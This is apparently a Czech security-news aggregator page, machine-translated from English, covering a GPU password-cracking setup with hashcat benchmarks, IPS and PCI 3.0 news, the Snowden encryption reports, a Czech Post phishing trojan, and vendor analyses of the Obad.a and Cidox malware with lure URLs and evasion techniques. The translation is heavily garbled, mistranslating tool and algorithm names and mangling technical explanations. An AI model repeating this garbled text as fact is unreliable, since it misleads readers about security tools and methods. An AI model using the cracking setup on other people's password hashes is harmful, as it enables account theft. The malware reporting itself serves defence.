I když obě tyto karty hrát skvělé pro grafiky, AMD má hrany a při práci crypto - zdá se, že lépe integer výpočetní podporu, takže nástroje jako Hashcat či Jan Ripper mají tendenci běžet rychleji. Ve virtuálním prostředí se zdá, AMD karty lépe pracovat s VT-d (tzv. Device Passthrough v rozhraní ESXi). Chcete-li použít NVIDIA GPU, budete opravdu instalovat ovladače v ESXi, a budete se měly omezit na nejdražší karty NVIDIA Quadro (6000, 5000, 4000, nebo Tesla nebo Grid karty). To je vlastně docela v pohodě, jak můžete rozšířit GPU přes více VM je pro virtuální desktop aplikace jako CAD a podobně. Ale rozdělení výkon GPU karty po více VM je porazí celý bod budování VM pro krakování. V mé laboratoři, jsem si vybral AMD Radeon 7970 - to má velký výpočetní výkon, a to bylo na prodej v tomto týdnu. 7900 to zdá být v pořádku v koleni křivky, přesně tam, kde větší výpočetní výkon začne stát neúměrně více peněz.
Takže, když jsou všechny předpoklady jsou na místě, jsme připraveni jít.
1 / Nejprve nainstalujte kartu.
2 / Dále se k ESXi, budeme potřebovat k tomu, aby zařízení passthrough (VT-d) pro náš nový přístroj. Zjistíte to v Nastavení serveru / pokročilé / Edit. Vyberte novou kartu (která také vybere slot PCIe, že je to in), a ušetřit. Budete muset restartovat server po to udělat.
3 / Dále, na naši VM. Půjdeme na "Upravit nastavení / Přidat hardware" obrazovce a přidejte nové zařízení PCI. Jakmile je to hotovo, vMotion a HA již nebude možné tento virtuální počítač, protože je vázána na konkrétní PCIe slotu na serveru. Dokonce i studené migrují (migrace s VM vypnutém) bude znamenat skákání přes obruče - vyjmutím karty migraci znovu přidat kartu po migraci (budete samozřejmě potřebovat identický hardware na cílovém serveru, jakmile je migrace dokončení)
4 / Po instalaci správného ovladače AMD ve VM a vidíme svou kartu! Nechal jsem kartu na skladě hodnot pro všechno, nebylo nic přetaktovaný nebo vně výchozího nastavení.
. 5 / Dále budeme muset nainstalovat pak OpenCL SDK ve VM (Staženo z AMD) Na tomto místě budete moci využívat výpočetní výkon GPU v jakékoli aplikace napsané pro něj - já jsem s použitím Hashcat a John the Ripper, oba pracují skvěle! Běh hashcat měřítko (oclHashcat-lite64.exe-b) vidí kartu jako "Tahiti" (kódové označení pro sérii 7900) nám dává nějaké opravdu impozantní čísla - například 8765,0 M / s pro MD5 (ano, to je v MIL Hashes za sekundu). Zatímco skutečná propustnost na "no-lite" verze bude o něco pomalejší, tato čísla jsou dost blízko k pravdě.
Jen tak pro zábavu, Nainstaloval jsem stejný nastavení na podobné, ale fyzickém stroji (3.5 GHz i7 quard jádro, jako poosed na 3,3 GHz Quad XEON v mém serveru ESXi). Můžete vidět z níže uvedené tabulky, že propustnost na hash výpočty jsou velmi blízko, s i7 nastavení trochu pomalejší. Je to v situacích, jako je tato, kde uvidíte funkce v "Class Server" procesorů dělat rozdíl - věci, jako je větší cache procesoru například. Můj ESXi server byl spuštěn můj dětský Minecraft server (s ním a všemi svými přáteli na něm), a navíc jsme byli streamování videa mimo jiné VM pracující DLNA služby pro naše TV a hashcat ve VM je stále trvale rychlejší než fyzickém hostiteli spuštění pracovní stanice CPU obdobných specifikace.
Čísla pro fyzické i virtuální a fyzické servery jsou uvedeny níže. Z toho můžeme vyvodit několik důležitých závěrů:
Hašovací algoritmy šifrování a fungovaly velmi dobře v minulosti, protože napájení procesoru se zvýšila, jsme byli schopni zůstat na špici s lepším šifrováním DES (3DES pak následuje například AES). I když by se vždy brute-force krátké řetězce, jako jsou hesla, další výpočet zapojeni do každé následné algoritmu znamená, že v každém okamžiku, praskání aktuální algoritmus na současný hardware by trvalo příliš dlouho, aby byly praktické (pokud jste měl národ-státní rozpočty to je) - v podstatě to je Moorův zákon v akci. Výkon těchto nových GPU karty přinést ke stolu dává hardwaru stranu rovnice "leapfrog efekt" - jsme zvýšení dešifrovací způsobilost několik řádů - podle spoustou nul!. A já nevidím zásadní posun na druhé straně, žádný nový "1000 nebo 1000000 krát tvrdší" algoritmus, který dělá to "dost těžké", aby brutální nutit hesla nepraktické. Naše nejlepší obrana je dnes již hesla - to je oblast, kde velikosti záleží, a větší je lepší. Ale co je opravdu potřeba, je alternativou hesla, nebo úplně jiný způsob jejich uložení. MD5 a SHA1 by se již neměla používat pro ukládání hesel, nikdy - s tímto druhem propustnosti k dispozici útočníky s minimálními rozpočty dokonce, že je to prostě příliš snadné rozlousknout tyto dosud běžně používané algoritmy. Měli byste být schopni vlastní závěry o tom, co je lepší způsob, jak jít (dívat se do dolní části seznamu, nebo se podívejte na to, co není na seznamu zatím). PBKDF2 (RFC 2898) není v současné době na seznamu HASHCAT v podporovaných algoritmů. Tento nový algoritmus není široce nasazen ještě, ale cílem je "jíst" mnohem vyšší počet cyklů výpočetních, takže je ideální pro uložení hesla (zejména pokud SHA256 se používá místo výchozí SHA1). To může být náš nejlepší sázka na uložení hesla, krátkodobě (nemám kritéria pro to ještě). Jsme však svědky GPU podporu tohoto algoritmu John Ripper.
Hash Typ Orientační hodnoty Na VM Na fyzické MD4 ($ průkaz. $ sůl) 16582.8M / s 14963.5M / s MD4 15715.4M / s 14578.4M / s NTLM 15485.1M / s 14246.9M / s MD5 8765.0M / s 8291.2M / s md5 ($ průkaz. $ sůl) 8725.6M / s 8324.7M / s Joomla 8464.9M / s 8349.0M / s NetNTLMv1-VANILKA / NetNTLMv1 + ESS 7624.8M / s 7034.0M / s Cisco PIX MD5 5895.5M / s 5703.7M / s Polovina MD5 5291.4M / s 5230.3M / s DCC, mscash 4438.9M / s 4297.6M / s Dvoulůžkový MD5 2502.7M / s 2448.9M / s vBulletin <v3.8.5 2492.4M / s 2427.9M / s SSHA-1 (Base64), nsldaps, Netscape LDAP SSHA 2361.5M / s 2314.3M / s sha1 ($ průkaz. $ sůl) 2359.4M / s 2314.3M / s SHA1 2355.9M / s 2314.5M / s Oracle 11g 2350.3M / s 2303.0M / s MSSQL (2005) 2334.3M / s 2299.4M / s MSSQL (2000) 2311.3M / s 2309.7M / s SHA-1 (Base64), nsldap, Netscape LDAP SHA 2276.0M / s 2295.8M / s vBulletin> v3.8.5 1697.7M / s 1628.0M / s IPB2 +, + MyBB1.2 1693.8M / s 1670.8M / s LM 1221.7M / s 1002.0M / s MySQL 1141.9M / s 1121.0M / s Cisco IOS-SHA256 1114.7M / s 1039.1M / s sha256 ($ průkaz. $ sůl) 1111.6M / s 1056.1M / s SHA256 1109.7M / s 1053.8M / s NetNTLMv2 448.0M / s 447.1M / s Oracle 7-10 g 210.7M / s 181.8M / s descrypt, DES (Unix), tradiční DES 47052.0k / s 44934.1k / s SHA512 86120.7k / s 85831.9k / s SHA512 ($ průkaz. $ sůl) 86108.5k / s 85799.1k / s SHA-3 (Keccak) 79302.0k / s 78995.5k / s
Co je dalšího u IPS?
6.9.2013 Zabezpečení
Zajímá vás, kde IPS (Intrusion Prevention Systems) se bude v příštích letech? Myslíte si, že uvidíme více HIPS (Host Intrusion Prevention Systems), promítá se do konzole IPS nebo větší integraci s Siems? Nebo se vidíme jen lepší verze, co máme dnes? Nebo jste možná jen zeptat, jestli vaše organizace potřebuje IPS? Ať tak či onak, jsme zájem o náš vstup! Máme přehled běží vyzvednout vzít na IPS je, a kde můžete očekávat (nebo chcete), je vidět vyvíjet v příštích letech: https://www.surveymonkey.com/s/2013SANSNetworkSecuritySurvey Budeme sběr výsledky brzy, a bude jejich sdílení v SANS analytik Webcast v říjnu - více informací zde: https://www.sans.org/webcasts/survey-network-security-96967
Připravte se na PCI 3.0
6.9.2013 Ostatní
Přesně podle plánu (viz jejich životního cyklu doc na https://www.pcisecuritystandards.org/pdfs/pci_lifecycle_for_changes_to_dss_and_padss.pdf ), lidé v PCI DSS vydali ", co očekávat" dokument pro PCI 3.0. Jsem trochu pozdě, komentuje to - tak nějak jsem vynechal, když byl vyslán v srpnu. Konkrétně říká v dokumentu jsou:
Nedostatek vzdělání a osvěty Slabá hesla, autentizace Třetí strana Problém bezpečnosti Pomalu s automatickou detekcí, malware Nesoulad v hodnocení
Změna dokument je zde: https://www.pcisecuritystandards.org/documents/DSS_and_PA-DSS_Change_Highlights.pdf
Bude zajímavé sledovat, jaký bude konečný dokument bude vypadat, když to bylo propuštěno v listopadu, a to, co se stane, když QSA tahu PCI vedení do auditních zjištěních a doporučeních.
Rozvědky podle Snowdena prolomily internetové šifrování
6.9.2013 Špionáž
Americké a britské rozvědky prolomily šifrování, které zajišťuje širokou škálu online komunikace včetně e-mailů, bankovních transakcí a telefonických rozhovorů. Vyplývá to z nových dokumentů, které poskytl americký přeběhlík Edward Snowden listům The New York Times, ProPublica a The Guardian. Rozvědky prý schopné dešifrovat data i v případě ochrany údajně bezpečným kódováním, jež má zajistit soukromí.Americká Národní agentura pro bezpečnost (NSA) pracující společně se svým britským protějškem GCHQ toho dosáhla s využitím superpočítačů, soudních příkazů a do jisté míry i díky spolupráci technologických společností, naznačují zveřejněné dokumenty.
Pokud jsou tyto zprávy pravdivé, pak by tento vysoce utajovaný program rozvědky mohl být schopný přemoct většinu ochrany, která se používá, aby ochránila data a soukromí na internetu od e-mailů přes chaty až po komunikaci prostřednictvím chytrých telefonů, napsala agentura AFP.
List The Guardian s odvoláním na zveřejněné dokumenty uvedl, že zmíněné dvě špionážní agentury měly "utajené partnerství" s technologickými společnostmi a poskytovateli internetového připojení, což jim umožnilo vsunout "tajná zranitelná místa - známá jako backdoors nebo trapdoors (zadní nebo sklápěcí dvířka) - do komerčních kódovacích programů".
Podle zveřejněných zpráv oficiální činitelé americké rozvědky požádali list The New York Times a ProPublica, aby o této záležitosti nepsaly. Žádost odůvodnili obavou, že zveřejnění této informace přiměje zahraniční cíle "přepnout" na jiné formy šifrování nebo komunikace, které by bylo těžší získat či přečíst.
ProPublica, nezávislá a nezisková organizace věnující se investigativní žurnalistice, uvedla, že se rozhodla článek přesto vydat, protože jde o záležitost důležitou pro veřejnost. "Tento příběh, jak věříme, je významný. Ukazuje, že předpoklady milionů uživatelů internetu ohledně soukromí jejich elektronické komunikace jsou mylné," napsali redaktoři tohoto média.
Zveřejněné zprávy mimo jiné uvádějí, že NSA pracovala na prolomení internetového šifrování více než deset let od doby, co prohrála boj s cílem přimět technologické společnosti, aby jim samy poskytly dekódovací "klíče".
Agentura AFP se pokusila kontaktovat představitele americké rozvědky; ti ale zatím tyto zprávy nijak nekomentovali.
Zákeřný virus cílí na české uživatele. Snaží se jim vysát peníze z bankovních účtů.
5.9.2013 Viry | Kriminalita
Už od začátku minulého měsíce republikou kolují podvodné e-maily, ve kterých se počítačoví piráti vydávají za zaměstnance České pošty. Prostřednictvím odkazů v nich se šíří škodlivý trojský kůň, s jehož pomocí se snaží počítačoví piráti získat přístup k cizím bankovním účtům. E-maily se objevily také v Portugalsku, Turecku a Velké Británii, varovali ve čtvrtek zástupci Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Zvětšit obrázek FOTO: Ondřej Lazar Krynek, Novinky Dnes 16:53 „Jedná se o rozsáhlou akci, při které jsou ve čtyřech evropských zemích zneužívány etablované společnosti, jejichž jménem je šířen nový a velmi sofistikovaný trojský kůň,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT.
„Win32/Spy.Hesperbot je velmi silný bankovní trojský kůň s mnoha 'užitečnými' funkcemi, jako je logování zmáčknutých kláves, vytváření screenshotů a nahrávání videa. Dokáže také spustit vzdálenou proxy, vytvořit skrytý VNC server umožňující vzdáleně ovládat infikovaný počítač,“ konstatoval Bašta.
Podvodný e-mail Podvodný e-mail FOTO: CSIRT
Podle něj jsou útočníci velice vychytralí a k penězům na účtu se dokážou dostat i přes potvrzovací SMS. „Cílem útočníků je získat přihlašovací údaje do bankovních účtů obětí a zároveň je donutit k instalaci dalšího malwaru na jejich Android, Symbian, či Blackberry telefony,“ prohlásil bezpečnostní analytik z týmu CSIRT.
Pokud se jim podaří infikovat také mobil, mají vyhráno. V cestě k penězům na bankovním účtu jim už nic nebrání.
Nevyžádané zprávy se začaly v Česku objevovat na začátku srpna. „V předmětu e-mailu je uvedeno ‘Informace o Vaší zásilce‘, v těle pak text o nedodání zásilky a upozornění na sankce,“ uvedla mluvčí České pošty Marta Selicharová s tím, že virus se do počítače dostane poté, co uživatel klikne na podvržený odkaz ve zprávě.
Podvodný e-mail jde poznat podle adresy Podle ní je podvodný e-mail odesílán z adresy cpost@ceskaposta.net nebo cpost@ceska-posta.net. Pošta ale informace o zásilkách rozesílá z adresy ceskaposta@cpost.cz. Zatímco v první vlně bylo na první pohled možné podvodný e-mail rozeznat podle pravopisných chyb a špatné diakritiky, aktuální kampaň je již zdařilá a méně pozorní uživatelé se mohou snadno nechat napálit.
„E-maily z uvedených adres nemají s Českou poštou nic společného, pokud by na ně kdokoli reagoval, hrozí mu riziko zavirování PC škodlivým kódem, takzvaným trojským koněm,“ uzavřela Selicharová s tím, že na poštu se již kvůli podvodné zprávě obrátily stovky lidí.
Pošta již dříve kvůli podvodným e-mailům podala trestní oznámení na Policii ČR na neznámého pachatele. Pokud se lidé setkají s podvodnou zprávou, pošta žádá o přeposlání na adresu info@cpost.cz.
Obad.a Trojan nyní distribuován přes mobilní botnety
5.9.2013 Blog Viry | Mobilní
Zdroj: Kaspersky
Na konci května jsme se hlásil o podrobnostech Backdoor.AndroidOS.Obad.a, nejvíce sofistikovaný mobilní Trojan k dnešnímu dni. V té době jsme měli téměř žádné informace o tom, jak tento kus malware dostane do mobilních zařízení. Od té doby jsme zkoumali, jak je distribuován Trojan a zjistil, že malware se majitelé vyvinuli techniku, která jsme nikdy nesetkali. Poprvé malware je distribuován pomocí botnetů, které byly vytvořeny pomocí zcela jiný mobilní malware.
Zatím jsme objevili čtyři základní metody používané k distribuci různých verzí Backdoor.AndroidOS.Obad.a.
Mobile Botnet
Nejzajímavější z těchto metod jsou ty, kde se Obad.a distribuovány spolu s jiným mobilním Trojan - SMS.AndroidOS.Opfake.a. To bylo nedávno popsáno v blogu VOM v škodlivými přílohami . Dvojitá infekce Pokus začíná, když uživatel získá textovou zprávu, která obsahuje následující text:
"Zpráva MMS byla doručena, stáhněte si z www.otkroi.com".
Pokud uživatel klikne na odkaz, který obsahuje soubor s názvem mms.apk Trojan-SMS.AndroidOS.Opfake.a je automaticky načten do smartphonu nebo tabletu. Malware nelze nainstalovat, pokud uživatelé spusťte jej. Pokud k tomu dojde, C & C serveru pokyn Trojan vyslat následující zprávu všem kontaktům oběti v adresáři:
"Máte novou zprávu MMS, stažení na - http://otkroi.net/12"
V návaznosti na odkaz automaticky načte Backdoor.AndroidOS.Obad.a pod jmény mms.apk nebo mmska.apk.
Rozsah této činnosti jasně ilustruje dat, která jsme získali od předního ruského mobilního operátora, který zjistil masovou distribuci škodlivých textové zprávy ve své síti. V prostoru pěti hodinách bylo 600 zprávy odeslané s jedním z Trojan-SMS.AndroidOS.Opfake.a úprav. Ve většině případů dodávka byla prostřednictvím infikovaných zařízení, zatímco předtím v podobných distribucí používá SMS brány. Současně, jen několik zařízení infikované Trojan-SMS.AndroidOS.Opfake.a distribuován odkazy na Backdoor.AndroidOS.Obad.a, takže jsme mohli konstatovat, že tvůrci nebezpečné Trojan pronajmout část mobilní botnet šířit jejich duchovním.
Kaspersky Lab údaje za pokusí nainstalovat Backdoor.AndroidOS.Obad.a blokovaných aplikací Kaspersky Internet Security pro Android také podporuje tento předpoklad. Téměř každý graf ukazuje strmý nárůst počtu útoků.
Tento bodec v instalačních pokusů je typický verzí Backdoor.AndroidOS.Obad.a, které jsou rozesety pomocí spamových zpráv. Tyto vrcholy jsou výsledkem použití třetích stran botnet zdroje - mobilní zařízení napadeny jiným malwarem. To znamená, že majitelé Backdoor.AndroidOS.Obad.a nejen velet vlastní software šířit sám, ale také využít trojských koní provozované jinými zločinci.
Tradiční SMS spam
Nejstarší verze Backdoor.AndroidOS.Obad.a bylo dodáno tímto způsobem, a zprávy spam textu jsou stále základní způsob doručování Trojan do mobilních zařízení. Například pod názvem DOLG.INFO poslali textovou zprávu s následujícím obsahem:
"Vy jste v prodlení. Podívejte se zde - http://dolzniki.info/1 »
Když uživatelé klikli na odkaz, byl soubor s názvem mms.apk obsahující Backdoor.AndroidOS.Obad.a automaticky načteny na svých mobilních zařízeních. Nicméně, k instalaci malwaru uživatelé měli spustit soubor sami.
Google Play falešný obchod
Další velmi populární způsob, jak distribuovat mobilní trojské koně, včetně Backdoor.AndroidOS.Obad.a, je umístit malware ve falešných aplikací obchodech. Zpravidla tvůrci takových obchodů zkopírovat Google Play oficiální obsah a náhradní spojení na legitimních žádostí o ilegálních. Je snadné narazit na falešné, s Vyhledávače často směrují návštěvníky do pochybných obchodů.
Na obrázku výše je uživatel vyzván, aby stáhnout a nainstalovat populární mobilní hru, přijímat pouze kus malware, v tomto případě - Backdoor.AndroidOS.Obad.a. Objevili jsme dvě lokality, které distribuují úpravy Trojan: p1ay-goog1e.mobi a p1aygoog1e.com.
Přesměrování z prasklých míst
Pachatelé také bezva legitimní stránky, aby bylo možné přesměrovat uživatele na jiné stránky. Ve většině případů jsou návštěvníci přesměrováni změnou htaccess.:
A občas přidáním škodlivého kódu do lokality JS skripty:
V případě Backdoor.AndroidOS.Obad.a, cílem je infikovat mobilní uživatele. Pokud se potenciální oběť vstupuje do stránky ze svého domácího počítače, není přesměrování, ale majitelé mobilních zařízení (bez ohledu na to, co oni používají OS) se na jednu z následujících stránek:
Celkem jsme objevili 120 popraskané webových stránek, které uživatelé mobilních telefonů přesměrované na nbelt.ru, kde našli stránky, jako je tento. Po kliknutí na libovolné místo na stránce, mobilní zařízení stáhnout Backdoor.AndroidOS.Obad.a.
Závěr
V uplynulých třech měsících jsme zjistili 12 verze Backdoor.AndroidOS.Obad.a. Všichni měli stejné funkční sadu a vysokou úroveň kódu mlžení. Každý používal OS Android zranitelnost, která umožňuje získat malware DeviceAdministrator práva a dělal to podstatně složitější odstranit. Informovali jsme Google o to, jakmile jsme zjistili, takže chyba byla uzavřena v novém Android 4.3. Bohužel, tato verze je nyní k dispozici na omezený počet nových smartphonů a tabletů - zařízení, která používají dřívější verze platformy jsou stále v ohrožení. Nicméně, nejnovější verze KIS pro Android 11.1.4 odstranit Backdoor.AndroidOS.Obad.a z libovolné verze Android navzdory přítomnosti zranitelnosti.
Také jsme zjistili, že Trojan se většinou nacházejí v zemích SNS. Více než 83% infekčních pokusů Backdoor.AndroidOS.Obad.a byly pozorovány v Rusku. Stejné Trojan byl také zjištěn v mobilních zařízeních v Kazachstánu, Uzbekistánu, Běloruska a Ukrajiny.
Majitelé Backdoor.AndroidOS.Obad.a musí se rozhodl kout železo, dokud je horké, takže jsou pomocí tradičních i zcela nové přístupy. Setkali jsme se vůbec první případ, kdy jsou mobilní botnety slouží k distribuci mobilního Trojan, který prokáže, že počítačoví zločinci stále přizpůsobovat a aktualizovat své infekci techniky. Hrozba Backdoor.AndroidOS.Obad.a zůstává velmi reálná.
Nový objev umožní rozsáhlé kvantovou kryptografii sítí
05.09.2013 Kryptografie
Vědci z Toshiba objevili metodu vybudovat kvantovou kryptografii komunikačních sítí s daleko větším měřítku než kdy předtím. Umožní kvantová kryptografie, které mají být použity za její stávající specializovaných aplikacích, například jako součást inteligentní sítě na úrovni Společenství, které řídí a kontrolují výrobě a spotřebě energie v budoucnosti. Průlom budou oznámeny ve vědeckém časopise Nature.
Kvantová kryptografie ukazuje velký potenciál revolučním způsobem citlivá data chráněna. Může být použit k distribuci tajných číselných tlačítek s cenným papírem, který není citlivá na pokroky v matematice výpočetní techniky, nebo, a jakýkoli hacker, že "kohouty" optické vlákno bude detekována. Současně, mohlo by se stát prvním převažující technologie k využití podivné zákony kvantové fyziky. však stále velké překážky je třeba překonat, aby kvantová kryptografie přijatelná pro široké použití, zejména pokud jde o počet uživatelů, než může být připojen k jedné síti. Až do teď, provádění kvantová kryptografie síť vyžaduje propracovaný foton detektor pro každého dalšího uživatele. Toshiba tým objevil techniku, aby mnoho uživatelů sdílet jeden detektor a tím výrazně snížit složitost sítě. Tento průlom znamená, že se současnou technologií by bylo možné pro 64 uživatelům připojit se k jednomu detektoru v přístupu k síti Quantum. Toshiba Quantum přístupová síť používá standardní optické komponenty, které umožňují signály z více uživatelů bude sloučen a přenášen na jednom vlákno. Vzhledem k tomu, foton detektor je nejsložitější část systému kvantové kryptografie, je tato umístěna na společném konci Network Access Quantum, přičemž každý uživatel má foton vysílač zahrnující jen standardní komponenty. This uspořádání výrazně snižuje hardwarové požadavky a náklady pro každého uživatele přidán do sítě. Tento průlom je umožněno rychlé detector vyvinula společnost Toshiba, který může počítat až jedné miliardy jednotlivých částic světla (fotony) za sekundu. Díky své velmi vysoké objasněnosti, může to být přijímač sdílena mezi více vysílačů v point-to-multipoint spojení. Zkoušky osm kanálů pro přístup k síti Quantum prokázáno, že uživatel může přenášet tajné klíče s přenosovou rychlostí přesahující 250 kbit / s nebo 80 GByte za měsíc, což je dost pro každého uživatele, šifrování jeden milion e-mailů. Dalším velkým úkolem bylo negovat vliv kolísání teploty pro více uživatelů sdílející stejnou odkaz. Malé změny v lokální teploty a to i zlomek míry, může výrazně ovlivnit délku vláken v každém vysílači. Nebudou-li by to způsobit chyby v systému kryptografie kvantové a zastavit její provoz v několika vteřinách. Nicméně, tým Toshiba vynalezl metodu pro kompenzaci změny v délce vlákna v každém vysílači a tím umožňují nepřetržitý provoz. V příspěvku tým ukazuje provoz po dobu 12 hodin.
Samsung Knox bude rozšířen o antivirus
Společnost Samsung chce chránit uživatele svých telefonů s operačním systémem Android pomocí předinstalovaného antivirového programu.
Software | Zabezpečení
Samsung uzavřel dohodu o spolupráci s výrobcem mobilních antivirových řešení Lookout. Do telefonů, ale i tabletů chce nasadit jeho bezpečnostní software. Služba má být primárně určena pro podnikové uživatele jako součást připravovaného bezpečnostního produktu Knox, který byl představen v březnu letošního roku.
Android je podle mnoha průzkumů vůbec nejčastějším terčem hackerských útoků. Ostatní systémy za jeho „popularitou“ mezi kyberzločinci obvykle výrazně zaostávají.
Společnost tak chce tímto krokem pravděpodobně firemním zákazníkům ukázat, že její telefony s Androidem jsou bezpečnou alternativou k platformám Blackberry a Windows Phone, které bezpečnost prezentují jako jednu ze svých klíčových vlastností.
V reakci na uzavření spolupráce generální ředitel Lookoutu John Hering ve svém blogovém příspěvku uvedl, že přítomnost nějaké ochrany proti malwaru se stává tím důležitější, čím roste počet zaměstnanců používajících pro práci vlastní zařízení.
„Každá třetí firma dnes svým zaměstnancům umožňuje používat vlastní zařízení. Ti pak prostřednictvím nich vynášejí podniková data mimo firemní síť, ačkoliv k tomu často nemají povolení,“ napsal Hering.
Společnost bude za použití svých serverů skenovat uživatelská zařízení a vyhledávat potenciálně nebezpečný obsah, který se do nich může dostat z e-mailů, webových stránek nebo služeb pro sdílení dat.
Jak již bylo řečeno, Android je považován za jednu z nejméně bezpečných mobilních platforem. Ruská společnost Kaspersky nedávno informovala, že od počátku tohoto roku identifikovala již 57 tisíc nových hrozeb zaměřených pouze na Android.
Společnost McAfee pak varovala před novými typy spywaru a kódy navrženými pro zneužití bankovních účtů. Jejich existence prý mezi dubnem a červnem způsobila nárůst malwaru pro Android o 35 %. Ve stejném duchu mluví i zpráva americké vlády, podle které je až 79 % všech mobilních útoků vedeno proti uživatelům Androidů.
Android je podle odborníků nejméně bezpečným mobilním systémem především proto, že jde o otevřenou platformu, kterou si každý může upravit k obrazu svému. Zabezpečit obrovské množství různých verzí tak není jednoduché.
Malware autoři Zaměstnávat Variety se vyhnout zabezpečení detekce
4.9.2013 Viry
McAfee Labs blogu jsme se zabývali mnoho technik, které používá malware vyhnout kód založený na detekci. V mém předchozím blogu jsem se zmínil postup prolog a epilog procedur techniky obejít bezpečnostní systémy . Nedávno jsme narazili na jednu sadu fake-výstražných vzorků, které používají různé techniky se vyhnout odhalení. Tato technika se týká dynamického zatížení knihovny za běhu. Dynamické načítání Dynamické zatížení je mechanismus, kterým se program načte knihovnu do paměti za běhu, aby se adresy funkcí a proměnných obsažených v knihovně mohou být provedeny, nebo přístup. Dynamické zatížení se provádí pomocí API LoadLibrary, která přebírá řetězec argument (název knihovny má být načten). Následující obrázek je typický LoadLibrary kód s argumentem.
Legit_Way_Test Typický LoadLibraryExA API kód s argumentem. Předchozí model lze snadno identifikovat jak na chování a kódu založeného na detekci. To je důvod, proč vidíme různé způsoby předávání argument LoadLibrary API v některých fake-výstražných malware rodin. Následující screenshoty ukazují čtyři sady kódu, který slouží ke stejnému účelu přesunutí povinný argument do zásobníku. Kernel_1_Test První vzor pro pohyb argumenty. Kernel_2_Test Druhý vzor pro pohyb argumenty. Kernel_4_Test Třetí model pro pohyb argumenty. Kernel_3_Test Čtvrtý model pro pohyb argumenty. Malware autoři jsou vždy hledají nové techniky se vyhnout detekci, ale nakonec jejich techniky jsou objeveny a zablokován výzkumníky bezpečnosti. McAfee detekuje všechny varianty, které používají tyto techniky.
Cidox Trojan Vtipy HTTP Hlavička hostitele se vyhnout detekci
4.09.2013 Viry | Hacking
V poslední době jsme zaznamenali značný počet vzorků generujících nějaký zajímavý síťový provoz prostřednictvím naší automatizované rámce. Síť HTTP generovaný vzorek obsahuje několik zajímavých parametrů, názvy jako "AV" (a pro antivirus?) A "& vm =" (VMware?), Obdržíme jako odpověď se zdála být šifrována, což mě upozornil. Také všechny síťový provoz obsahoval stejný záhlaví hostitele ukazující na metrika.yandex.ru. Tyto vzorky se ukázalo být ve vztahu k Cidox Trojan rodiny. Zde je paket Wireshark zachycení požadavku GET: cidox_http_traffic Dalo by se okamžitě k závěru, že název hostitele v požadavku GET je viník a může být ohrožena, nebo je útočník doména, která není pro tento vzorek. Doména vypadal jako legitimní, protože yandex.ru je největší vyhledávač v Rusku. Chcete-li ověřit, rychle jsem zkontroloval zachycování paketů na žádost DNS a IP adresy (kde byl poslán požadavek GET), se liší od adresy IP metrika.yandex.ru. To mi říká, že hlavičky hostitele v požadavku GET je falešné a musí být pevně v těchto vzorcích. Viděli jsme tento trik používá nedávno malware autorů, v nichž jsou HTTP hlavičky hostitele falešnou poukázat na legitimní domén vyhnout detekci na základě hlaviček hostitele nebo vyhnout se výzkumníkům nebo automatizovaných nástrojů. Odpověď ze vzdáleného serveru byl šifrována, takže jsem se rozhodl podívat se do něj. Škodlivý binární používá vlastní balírny a nebylo těžké vybalit. unpack_data_mz Po vybalení můžete vidět několik zajímavých řetězce v binární níže: cidox_strings_unpacked Tento binární kontroluje, zda je vzorek běží pod VMware a také hledá antimalware služeb. Pamatujte si, že síťový provoz je uvedeno výše obsahuje "& vm =" a "& AV =" parametry. Můžeme uzavřít tento binární nastaví tyto parametry na základě předchozích kontrol. Mohl bych pokračovat dál a dál v tomto blogu, ale kvůli tobě se budu soustředit jen na několik důležitých položek. Binární začíná svou hlavní činnost podle způsobu procesu náhradní k přepsání paměti o probíhajícím procesu s nebezpečným spustitelný soubor. Binární vytváří "explorer.exe" proces pozastaven režimu a mapy paměti procesu s vlastním kódem, viz následující: cidox_create_process To pak spustí namapované binární kód s "ResumeThread" postupu. Binární další kapky několik souborů: dropped_explorer Stanoví klíč registru s hodnotou, která je cesta k DLL tak, aby každý proces pomocí User32.dll načte tuto knihovnu. Také to klesne některé konfigurační soubory v adresáři Cookies: dropped_cf_files Soubor CF je šifrována, a podíváme se na zašifrovaný soubor krátce, ale nejprve musíme vidět HTTP hlavičky generované tímto binární. Binární shromažďuje informace, jako jsou prohlížeče, operační systém, antimalware a VMware kontroly, verzi operačního systému (32 nebo 64 bit), atd. a připravuje požadavku HTTP GET. Zde je screenshot z požadavku GET záhlaví v procesu: cidox_get_request_header Jak jsme tušili, binární má pevně záhlaví hostitele, který ukazuje na metrika.yandex.ru, ale skutečná doména je odlišná. To může přijít z vynechaného šifrovaného konfiguračního souboru. Odpověď ze serveru jsou šifrovány takto: cidox_encryted_response Binární používá vlastní Tiny Encryption Algorithm (TEA) k šifrování a dešifrování dat. Zde byl hovor z dešifrovat odpověď ze serveru: cidox_tea_call TEA používá 128bitový klíč k šifrování a dešifrování své rutiny. Binární používá dva pevně klíče: jeden pro dešifrování dat pochází ze serveru a druhé uchovává data v zašifrované podobě, jak je uvedeno v předchozím obrázku. Je snadné zjistit Kódovací metoda založená na několika konstantní hodnoty zjištěné v algoritmu. Zde je snímek TEA kód: tea_decryption_code Po dešifrování odpovědi vyklube konfigurační soubor obsahující názvy domén, jak je vidět níže: cidox_decrypted_config Binární informace ukládá v zašifrované podobě v souboru cf, jak jsme viděli dříve. Binární stáhne a nainstaluje další škodlivý program z jiného serveru s názvem v konfiguračním souboru. Zde je požadavek: http_objects Žádost o dldc.php odešle zašifrovanou odpověď, která obsahuje jiný spustitelný soubor. dldc_exe Nebudeme zacházet do podrobností staženého binární. Útočník za tento trojan shromažďuje velké množství informací prostřednictvím požadavku GET, včetně Antimalware nebo VMware kontroly. Binární umožňuje detekci obtížné pro automatizované procesy nebo EZS nebo preventivní ochranné systémy, pomocí podvržené názvů hlavičky hostitele a vlastní Čaje pro šifrování dat. Jak jsme se dozvěděli, nemůžeme spoléhat pouze na hostitele záhlaví HTTP posoudit, zda název domény použitý v HTTP hlavicce je škodlivý.
FireEye představuje v reálném čase, nepřetržité ochrany platformu
04.09.2013 Zabezpečení
FireEye oznámil Oculus, globální, v reálném čase, nepřetržitá ochrana platformy.
